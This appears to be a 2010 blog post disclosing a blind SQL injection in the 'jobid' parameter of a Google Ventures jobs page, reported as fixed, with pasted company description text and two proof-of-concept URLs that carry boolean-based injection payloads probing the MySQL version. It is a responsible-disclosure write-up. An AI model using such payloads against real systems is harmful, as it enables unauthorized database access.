These issues got fixed all and I want to say that Google Security Team did a good job and they fixed it soon.
All issues was discovered between 4 May and 9 May (year 2010, of course).
Risk: High
We do primarily three things:
- Seek out the most innovative and interesting entrepreneurs and companies we can find
- Perform in-depth due diligence and invest in those we are most excited about
- Do everything we can to help those companies succeed
We invest for financial return, across all sectors and in all stages of a company’s growth. We are particularly interested in areas where access to our team, facilities, technology or other resources can help a company become more successful, but we do not limit our investments to those of strategic interest to Google – we look for companies and people that have the best opportunity to create significant, disruptive and innovative ventures.
Source: here
Site was made using PHP+MySQL (some parts) and GET var "jobid" vulnerable to injection of SQL code.
Proofs Of Concept (Searching MySQL version)
Return: 1=1 (True), so MySQL version is 5
Link PoC -> http://jobs.googleventures.com/jobdetail.php?jobid=39109+AND+IF(substring(@@version,1,1)=5,1,0)=1--
Fig. 1: BSQLi. True result.
Return 1=0 (False), so MySQL version isn't 4.
Link PoC -> http://jobs.googleventures.com/jobdetail.php?jobid=39109+AND+IF(substring(@@version,1,1)=4,1,0)=1--
Fig. 2: BSQLi. False result.
Also I tried to get a SQL Injection, with "Union Select" Statement but It didn't work.
Fig. 3: Trying SQL Injection "Union Select". MySQL error.
I didn't want to do a further research because I considered that it was enough.
Be safe ;)
No hay comentarios:
Publicar un comentario